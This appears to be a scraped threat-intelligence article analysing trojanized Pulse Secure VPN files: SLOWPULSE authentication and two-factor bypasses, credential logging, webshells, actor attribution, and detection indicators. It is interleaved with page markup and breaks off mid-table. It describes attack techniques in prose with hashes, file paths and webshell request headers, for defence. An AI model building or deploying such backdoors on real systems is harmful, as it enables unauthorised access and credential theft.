[CVE-2021-20021 Success] EXPLOIT - SONICWALL ES [CVE-2021-20023 Attempt] EXPLOIT - SONICWALL ES [CVE-2021-20023 Success]</p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> <h4>Mandiant Security Validation Actions</h4> <p>Organizations can validate their security controls using the following actions with <a href="https://www.mandiant.com/advantage/security-validation" rel="noopener noreferrer" target="_blank">Mandiant Security Validation</a>.</p> <p> </p> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"><table border="1" style="border-collapse:collapse;width:100%"> <tbody> <tr> <td style="width:47.0588%"> <p><strong>VID</strong> </p> </td> <td style="width:52.9412%"> <p><strong>Title</strong> </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-596 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - SLOWPULSE, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-597 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - SLOWPULSE, Download, Variant #2 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-598 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - SLOWPULSE, Download, Variant #3 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-599 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - SLOWPULSE, Download, Variant #4 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-600 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - SLOWPULSE, Download, Variant #5 </p> </td> </tr> <tr> 
<td style="width:47.0588%"> <p>A101-601 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - SLOWPULSE, Download, Variant #6 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-602 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - SLOWPULSE, Download, Variant #7 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-604 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - Pulse Secure Vulnerability, Utility, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-605 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - RADIALPULSE, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-606 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - PULSEJUMP, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-607 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - HARDPULSE, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-608 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - SLIGHTPULSE, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-609 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - LOCKPICK, Patcher, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-610 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - LOCKPICK, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-611 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - ATRIUM, Patcher, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-612 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - PACEMAKER, Launcher, Download, Variant #1</p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-613 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - PACEMAKER, Download, Variant #1 </p> </td> </tr> <tr> <td 
style="width:47.0588%"> <p>A101-614 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - QUIETPULSE Utility, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-615 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - QUIETPULSE, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-616 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - STEADYPULSE, Download, Variant #2 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-617 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - STEADYPULSE, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-618 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - ATRIUM, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-619 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - THINBLOOD, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-620 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - THINBLOOD, Download, Variant #2 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-621 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - PULSECHECK, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-622 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - PULSECHECK, Download, Variant #2 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A104-757 </p> </td> <td style="width:52.9412%"> <p>Host CLI - QUIETPULSE Utility, Check, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A104-758 </p> </td> <td style="width:52.9412%"> <p>Host CLI - QUIETPULSE Utility, Check, Variant #2 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A104-759 </p> </td> <td style="width:52.9412%"> <p>Host CLI - QUIETPULSE Utility, Check, Variant #3 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A104-760 </p> </td> <td 
style="width:52.9412%"> <p>Host CLI - QUIETPULSE Utility, Check, Variant #4 </p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> <h4>Acknowledgements</h4> <p>Mandiant would like to thank the Stroz Friedberg DFIR and Security Testing teams for their collaboration with the analysis and research. The team would also like to thank Joshua Villanueva, Regina Elwell, Jonathan Lepore, Dimiter Andonov, Josh Triplett, Jacob Thompson and Michael Dockry for their hard work in analysis and blog content.</p></span></section><section class="kcBhad"><section class="Fabbec"><span class="WrMNjb">Posted in</span><ul class="FzXI4e"><li class="I4B51b"><a href="https://cloud.google.com/blog/topics/threat-intelligence" track-metadata-position="body"track-metadata-eventdetail="cloud.google.com/blog/topics/threat-intelligence"track-metadata-module="tag list"track-metadata-module_headline="posted in">Threat Intelligence</a></li><li class="I4B51b"><a href="https://cloud.google.com/blog/products/identity-security" track-metadata-position="body"track-metadata-eventdetail="cloud.google.com/blog/products/identity-security"track-metadata-module="tag list"track-metadata-module_headline="posted in">Security &amp; Identity</a></li></ul></section></section></div></div></div></div></div><section class="nRhiJb-DARUcf " track-metadata-module="related articles" track-metadata-module_headline="related articles"><div class="nRhiJb-DbgRPb-c5RTEf-ma6Yeb nRhiJb-DbgRPb-wNfPc-cGMI2b"><h5 class="Qwf2Db-MnozTc Qwf2Db-MnozTc-OWXEXe-MnozTc-wNfPc nRhiJb-DbgRPb-II5mzb-cGMI2b">Related articles</h5><section class="m9cUGf HGev3 nJD2Qe nRhiJb-ObfsIf"><div class=" QaGyvd nRhiJb-kR0ZEf-OWXEXe-GV1x9e-c5RTEf nRhiJb-kR0ZEf-OWXEXe-GV1x9e-qWD73c-V2iZpe"><div class="mA0uBe"><a href="https://cloud.google.com/blog/topics/threat-intelligence/glassbridge-pro-prc-influence-operations" class="lD2oe" track-name="seeing through a glassbridge: understanding the digital marketing ecosystem spreading pro-prc 
\",\"url\":\"\"}],\"datePublished\":\"2021-04-20\",\"publisher\":{\"@type\":\"Organization\",\"name\":\"Google Cloud\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https://www.gstatic.com/devrel-devsite/prod/v8bb8fa0afe9a8c3a776ebeb25d421bb443344d789b3607754dfabea418b8c4be/cloud/images/cloud-logo.svg\"}},\"url\":\"https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\",\"keywords\":[\"Threat Intelligence\",\"Security \\u0026 Identity\"],\"timeRequired\":\"PT31M\"}\u003c/script\u003e"],["Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day"],null,null,[[null,null,[null,[null,"\u003cp\u003eWritten by: Dan Perez, Sarah Jones, Greg Wood, Stephen Eckels\u003c/p\u003e\n\u003chr\u003e"]]],[null,null,[null,[null,"\u003ch4\u003eExecutive Summary\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eMandiant recently responded to multiple security incidents involving compromises of Pulse Secure VPN appliances.\u003c/li\u003e\n\u003cli\u003eThis blog post examines multiple, related techniques for bypassing single and multifactor authentication on Pulse Secure VPN devices, persisting across upgrades, and maintaining access through webshells.\u003c/li\u003e\n\u003cli\u003eThe investigation by Pulse Secure has determined that a combination of prior vulnerabilities and a previously unknown vulnerability discovered in April 2021, \u003ca href\u003d\"https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/\" rel\u003d\"noopener\" target\u003d\"_blank\"\u003eCVE-2021-22893\u003c/a\u003e, are responsible for the initial infection vector.\u003c/li\u003e\n\u003cli\u003ePulse Secure\u2019s parent company, Ivanti, released mitigations for a vulnerability exploited in relation to these malware families and the \u003ca href\u003d\"https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755\" rel\u003d\"noopener\" target\u003d\"_blank\"\u003ePulse 
Connect Secure Integrity Tool\u003c/a\u003e for their customers to determine if their systems are impacted. A final patch to address the vulnerability will be available in early May 2021.\u003c/li\u003e\n\u003cli\u003ePulse Secure has been working closely with Mandiant, affected customers, government partners, and other forensic experts to address these issues.\u003c/li\u003e\n\u003cli\u003eThere is no indication the identified backdoors were introduced through a supply chain compromise of the company\u2019s network or software deployment process.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eIntroduction\u003c/h4\u003e\n\u003cp\u003eMandiant is currently tracking 12 malware families associated with the exploitation of Pulse Secure VPN devices. These families are related to the circumvention of authentication and backdoor access to these devices, but they are not necessarily related to each other and have been observed in separate investigations. It is likely that multiple actors are responsible for the creation and deployment of these various code families.\u003c/p\u003e\n\u003cp\u003eThe focus of this report is on the activities of UNC2630 against U.S. Defense Industrial base (DIB) networks, but detailed malware analysis and detection methods for all samples observed at U.S. and European victim organizations are provided in the technical annex to assist network defenders in identifying a large range of malicious activity on affected appliances. 
Analysis is ongoing to determine the extent of the activity.\u003c/p\u003e\n\u003cp\u003eMandiant continues to collaborate with the Ivanti and Pulse Secure teams, Microsoft Threat Intelligence Center (MSTIC), and relevant government and law enforcement agencies to investigate the threat, as well as develop recommendations and mitigations for affected Pulse Secure VPN appliance owners.\u003c/p\u003e\n\u003cp\u003eAs part of their investigation, Ivanti has released mitigations for a vulnerability exploited in relation to this campaign as well as the \u003ca href\u003d\"https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755\" rel\u003d\"noopener\" target\u003d\"_blank\"\u003ePulse Connect Secure Integrity Tool\u003c/a\u003e to assist with determining if systems have been impacted.\u003c/p\u003e\n\u003ch4\u003eDetails\u003c/h4\u003e\n\u003cp\u003eEarly this year, Mandiant investigated multiple intrusions at defense, government, and financial organizations around the world. In each intrusion, the earliest evidence of attacker activity traced back to DHCP IP address ranges belonging to Pulse Secure VPN appliances in the affected environment.\u003c/p\u003e\n\u003cp\u003eIn many cases, we were not able to determine how actors obtained administrator-level access to the appliances. However, based on analysis by Ivanti, we suspect some intrusions were due to the exploitation of previously disclosed Pulse Secure vulnerabilities from 2019 and 2020 while other intrusions were due to the exploitation of \u003ca href\u003d\"https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/\" rel\u003d\"noopener\" target\u003d\"_blank\"\u003eCVE-2021-22893\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eWe observed UNC2630 harvesting credentials from various Pulse Secure VPN login flows, which ultimately allowed the actor to use legitimate account credentials to move laterally into the affected environments. 
In order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts on the VPN appliance. This was done to accomplish the following:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eTrojanize shared objects with malicious code to log credentials and bypass authentication flows, including multifactor authentication requirements. We track these trojanized assemblies as SLOWPULSE and its variants.\u003c/li\u003e\n\u003cli\u003eInject webshells we currently track as RADIALPULSE and PULSECHECK into legitimate Internet-accessible Pulse Secure VPN appliance administrative web pages for the devices.\u003c/li\u003e\n\u003cli\u003eToggle the filesystem between Read-Only and Read-Write modes to allow for file modification on a typically Read-Only filesystem.\u003c/li\u003e\n\u003cli\u003eMaintain persistence across VPN appliance general upgrades that are performed by the administrator.\u003c/li\u003e\n\u003cli\u003eUnpatch modified files and delete utilities and scripts after use to evade detection.\u003c/li\u003e\n\u003cli\u003eClear relevant log files utilizing a utility tracked as THINBLOOD based on an actor defined regular expression.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eIn a separate incident in March 2021, we observed UNC2717 using RADIALPULSE, PULSEJUMP, and HARDPULSE at a European organization. Although we did not observe PULSEJUMP or HARDPULSE used by UNC2630 against U.S. DIB companies, these malware families have shared characteristics and serve similar purposes to other code families used by UNC2630. We also observed an OpenSSL library file modified in similar fashion as the other trojanized shared objects. 
We believe that the modified library file, which we\u2019ve named LOCKPICK, could weaken encryption for communications used by the appliance, but do not have enough evidence to confirm this.\u003c/p\u003e\n\u003cp\u003eDue to a lack of context and forensic evidence at this time, Mandiant cannot associate all the code families described in this report to UNC2630 or UNC2717. We also note the possibility that one or more related groups is responsible for the development and dissemination of these different tools across loosely connected APT actors. It is likely that additional groups beyond UNC2630 and UNC2717 have adopted one or more of these tools. Despite these gaps in our understanding, we included detailed analysis, detection techniques, and mitigations for all code families in the Technical Annex.\u003c/p\u003e\n\u003ch4\u003eSLOWPULSE\u003c/h4\u003e\n\u003cp\u003eDuring our investigation into the activities of UNC2630, we uncovered a novel malware family we labeled SLOWPULSE. This malware and its variants are applied as modifications to legitimate Pulse Secure files to bypass or log credentials in the authentication flows that exist within the legitimate Pulse Secure shared object libdsplibs.so. Three of the four discovered variants enable the attacker to bypass two-factor authentication. A brief overview of these variants is covered in this section, refer to the Technical Annex for more details.\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 1\u003c/h5\u003e\n\u003cp\u003eThis variant is responsible for bypassing LDAP and RADIUS-2FA authentication routines if a secret backdoor password is provided by the attacker. 
The sample inspects login credentials used at the start of each protocol\u2019s associated routine and strategically forces execution down the successful authentication path if the provided password matches the attacker's chosen backdoor password.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eLDAP Auth Bypass\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eThe routine DSAuth::LDAPAuthServer::authenticate begins the LDAP authentication procedure. This variant inserts a check against the backdoor password after the bind routine so that the return value can be conditionally stomped to spoof successful authentication. Because the check runs after the bind attempt, the LDAP server itself still sees the failed bind, which is what the log correlation described under Detections and Mitigations relies on.\u003c/p\u003e"]]],[null,null,null,null,null,null,null,null,[[[null,"\u003cp\u003eFigure 1: LDAP Auth Bypass\u003c/p\u003e"],["https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure1_0_ayeu.max-1300x1300.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure1_0_ayeu.max-1100x1100.png 1060w, https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure1_0_ayeu.max-1300x1300.png 1260w"," 1060px, 1260px","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure1_0_ayeu.max-1300x1300.png"],null,3]]],[null,null,[null,[null,"\u003cp\u003e\u003cem\u003eRADIUS Two Factor Auth Bypass\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eThe routine DSAuth::RadiusAuthServer::checkUsernamePassword begins the RADIUS-2FA authentication procedure. This variant inserts checks against the backdoor password after the RADIUS authentication packet is received back from the authentication server. 
If the backdoor password is provided by the attacker, the packet type and successful authentication status flags are overwritten to spoof successful authentication.\u003c/p\u003e"]]],[null,null,null,null,null,null,null,null,[[[null,"\u003cp\u003eFigure 2: Radius-2FA Bypass\u003c/p\u003e"],["https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure2_0_ivmt.max-1300x1300.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure2_0_ivmt.max-1100x1100.png 1060w, https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure2_0_ivmt.max-1300x1300.png 1264w"," 1060px, 1264px","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure2_0_ivmt.max-1300x1300.png"],null,3]]],[null,null,[null,[null,"\u003ch5\u003eSLOWPULSE Variant 2\u003c/h5\u003e\n\u003cp\u003e\u003cem\u003eACE Two Factor Auth Credential Logging\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eThis variant logs credentials used during the ACE-2FA authentication procedure DSAuth::AceAuthServer::checkUsernamePassword. 
Rather than bypassing authentication, this variant logs the username and password to a file for later use by the attacker.\u003c/p\u003e"]]],[null,null,null,null,null,null,null,null,[[[null,"\u003cp\u003eFigure 3: ACE Auth Credential Log\u003c/p\u003e"],["https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure3_qswp.max-1300x1300.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure3_qswp.max-1100x1100.png 1060w, https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure3_qswp.max-1300x1300.png 1260w"," 1060px, 1260px","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure3_qswp.max-1300x1300.png"],null,3]]],[null,null,[null,[null,"\u003ch5\u003eSLOWPULSE Variant 3\u003c/h5\u003e\n\u003cp\u003e\u003cem\u003eACE Two Factor Auth Bypass\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eThis variant is responsible for bypassing the ACE-2FA logon procedure starting with DSAuth::AceAuthServer::checkUsernamePassword. The flow of the authentication procedure is modified to bypass the routine responsible for verifying the username and password if the backdoor password is provided. 
With this modification the attacker can spoof successful authentication.\u003c/p\u003e"]]],[null,null,null,null,null,null,null,null,[[[null,"\u003cp\u003eFigure 4: ACE Auth Bypass Variant\u003c/p\u003e"],["https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure4_meyx.max-1300x1300.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure4_meyx.max-1100x1100.png 1060w, https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure4_meyx.max-1300x1300.png 1258w"," 1060px, 1258px","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure4_meyx.max-1300x1300.png"],null,3]]],[null,null,[null,[null,"\u003ch5\u003eSLOWPULSE Variant 4\u003c/h5\u003e\n\u003cp\u003e\u003cem\u003eRealmSignin Two Factor Auth Bypass\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eThis variant bypasses the RealmSignin::runSecondaryAuth procedure of the Pulse Secure VPN. The inserted logic modifies the execution flow of a specific step of the login process to spoof successful authentication. We believe that this may be a two-factor authentication bypass.\u003c/p\u003e"]]],[null,null,null,null,null,null,null,null,[[[null,"\u003cp\u003eFigure 5: RealmSignIn 2FA Auth Bypass\u003c/p\u003e"],["https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure5_bwvy.max-1300x1300.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure5_bwvy.max-1100x1100.png 1060w, https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure5_bwvy.max-1300x1300.png 1254w"," 1060px, 1254px","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure5_bwvy.max-1300x1300.png"],null,3]]],[null,null,[null,[null,"\u003ch4\u003eAttribution\u003c/h4\u003e\n\u003cp\u003eWe are in the early stages of gathering evidence and making attribution assessments and there are a number of gaps in our understanding of UNC2630, UNC2717, and these 12 code families. 
Nevertheless, the Mandiant and Ivanti teams are proactively releasing this analysis to assist network defenders in triaging and identifying malicious activity on affected appliances.\u003c/p\u003e\n\u003cp\u003eMandiant is able to assess that:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUNC2630 targeted U.S. DIB companies with SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK as early as August 2020 until March 2021.\r\n\u003cul\u003e\n\u003cli\u003eWe suspect UNC2630 operates on behalf of the Chinese government and may have ties to APT5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eUNC2717 targeted global government agencies between October 2020 and March 2021 using HARDPULSE, QUIETPULSE, AND PULSEJUMP.\r\n\u003cul\u003e\n\u003cli\u003eWe do not have enough evidence about UNC2717 to determine government sponsorship or suspected affiliation with any known APT group.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eWe do not have enough information about the use of LOCKPICK to make an attribution statement.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch5\u003eUNC2630\u003c/h5\u003e\n\u003cp\u003eUNC2630\u2019s combination of infrastructure, tools, and on-network behavior appear to be unique, and we have not observed them during any other campaigns or at any other engagement. Despite these new tools and infrastructure, Mandiant analysts noted strong similarities to historic intrusions dating back to 2014 and 2015 and conducted by Chinese espionage actor APT5. We have also uncovered limited evidence to suggest that UNC2630 operates on behalf of the Chinese government. 
Analysis is still ongoing to determine the full scope of the activity that may be related to the group.\u003c/p\u003e\n\u003cp\u003eAlthough we are not able to definitively connect UNC2630 to APT5, or any other existing APT group, a trusted third party has uncovered evidence connecting this activity to historic campaigns which Mandiant tracks as Chinese espionage actor APT5. While we cannot make the same connections, the third party assessment is consistent with our understanding of APT5 and their historic TTPs and targets.\u003c/p\u003e\n\u003cp\u003eAPT5 has shown significant interest in compromising networking devices and manipulating the underlying software which supports these appliances. They have also consistently targeted defense and technology companies in the U.S., Europe, and Asia.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAs early as 2014, Mandiant Incident Response discovered APT5 making unauthorized code modifications to files in the embedded operating system of another technology platform.\u003c/li\u003e\n\u003cli\u003eIn 2015, APT5 compromised a U.S. telecommunications organization providing services and technologies for private and government entities. During this intrusion, the actors downloaded and modified some of the router images related to the company\u2019s network routers.\u003c/li\u003e\n\u003cli\u003eAlso during this time, APT5 stole files related to military technology from a South Asian defense organization. Observed filenames suggest the actors were interested in product specifications, emails concerning technical products, procurement bids and proposals, and documents on unmanned aerial vehicles (UAVs).\u003c/li\u003e\n\u003cli\u003eAPT5 persistently targets high value corporate networks and often re-compromises networks over many years. Their primary targets appear to be aerospace and defense companies located in the U.S., Europe, and Asia. 
Secondary targets (used to facilitate access to their primary targets) include network appliance manufacturers and software companies usually located in the U.S.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eRecommendations\u003c/h4\u003e\n\u003cp\u003eAll Pulse Connect Secure customers should assess the impact of the Pulse Secure mitigations and apply them if possible. Organizations should utilize the most recent version of Pulse Secure\u2019s Integrity Assurance utility \u003ca href\u003d\"https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755\" rel\u003d\"noopener\" target\u003d\"_blank\"\u003ereleased\u003c/a\u003e on March 31, 2021. If a device fails this Integrity Assurance utility, network administrators should follow the \u003ca href\u003d\"https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755\" rel\u003d\"noopener\" target\u003d\"_blank\"\u003einstructions here\u003c/a\u003e and contact their Pulse CSR for additional guidance. Because the tooling described above is built to persist across appliance upgrades, the integrity check should be re-run after any upgrade rather than assumed to pass.\u003c/p\u003e\n\u003cp\u003eOrganizations should examine available forensic evidence to determine if an attacker compromised user credentials. Ivanti highly recommends resetting all passwords in the environment and reviewing the configuration to ensure no service accounts can be used to authenticate to the vulnerable appliance.\u003c/p\u003e\n\u003cp\u003eAdditional detections, mitigations and relevant MITRE ATT\u0026amp;CK techniques are included in the Technical Annex. Sample hashes and analysis are included to enable defenders to quickly assess if their respective appliances have been affected. 
Yara rules, Snort rules, and hashes are published on \u003ca href\u003d\"https://github.com/mandiant/pulsesecure_exploitation_countermeasures/\" rel\u003d\"noopener\" target\u003d\"_blank\"\u003eMandiant\u2019s GitHub page\u003c/a\u003e.\u003c/p\u003e\n\u003ch4\u003eDetections and Mitigations\u003c/h4\u003e\n\u003cp\u003e1d3ab04e21cfd40aa8d4300a359a09e3b520d39b1496be1e4bc91ae1f6730ecc\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eHARDPULSE contains an embedded 'recovery' URL https://ive-host/dana-na/auth/recover[.]cgi?token\u003d that may be accessed by an attacker. The sample uses the POST parameters checkcode, hashid, m, and filename. This URL is not present in legitimate versions of this file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e7fa71a7f76ef63465cfeacf58217e0b66fc71bc81d37c44380a6f572b8a3ec7a\u003c/p\u003e\n\u003cp\u003e68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2\u003c/p\u003e\n\u003cp\u003ed72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ePULSEJUMP, RADIALPULSE AND PACEMAKER use the following files to record credentials:\r\n\u003cul\u003e\n\u003cli\u003e/tmp/dsactiveuser.statementcounters\u003c/li\u003e\n\u003cli\u003e/tmp/dsstartssh.statementcounters\u003c/li\u003e\n\u003cli\u003e/tmp/dsserver-check.statementcounters\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003ecd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe malicious operations of SLOWPULSE can be detected via log correlation between the authentication servers responsible for LDAP and RADIUS auth and the VPN server. 
Authentication failures in either LDAP or RADIUS logs with the associated VPN logins showing success would be an anomalous event worthy of flagging. Note that this correlation only surfaces the bypass variants: SLOWPULSE Variant 2 lets the ACE authentication complete normally and only records the credentials, and the ACE bypass (Variant 3) skips the username/password verification routine altogether, so neither is expected to leave a failure on the authentication server. For those, a VPN login that succeeds with no matching authentication attempt on the ACE server, or any write to /home/perl/PAUS.pm, is the signal to look for.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003ea1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpon invocation of the PULSECHECK webshell, the following HTTP request headers will be sent:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\u003ctable border\u003d\"1\" style\u003d\"border-collapse:collapse;width:100%\"\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:43.0481%\"\u003e\n\u003cp\u003e\u003cstrong\u003eKey\u003c/strong\u003e\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:56.9519%\"\u003e\n\u003cp\u003e\u003cstrong\u003eValue\u003c/strong\u003e\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:43.0481%\"\u003e\n\u003cp\u003eREQUEST_METHOD\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:56.9519%\"\u003e\n\u003cp\u003ePOST\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:43.0481%\"\u003e\n\u003cp\u003eHTTP_X_KEY\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:56.9519%\"\u003e\n\u003cp\u003e\u0026lt;BackdoorKey\u0026gt;\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd 
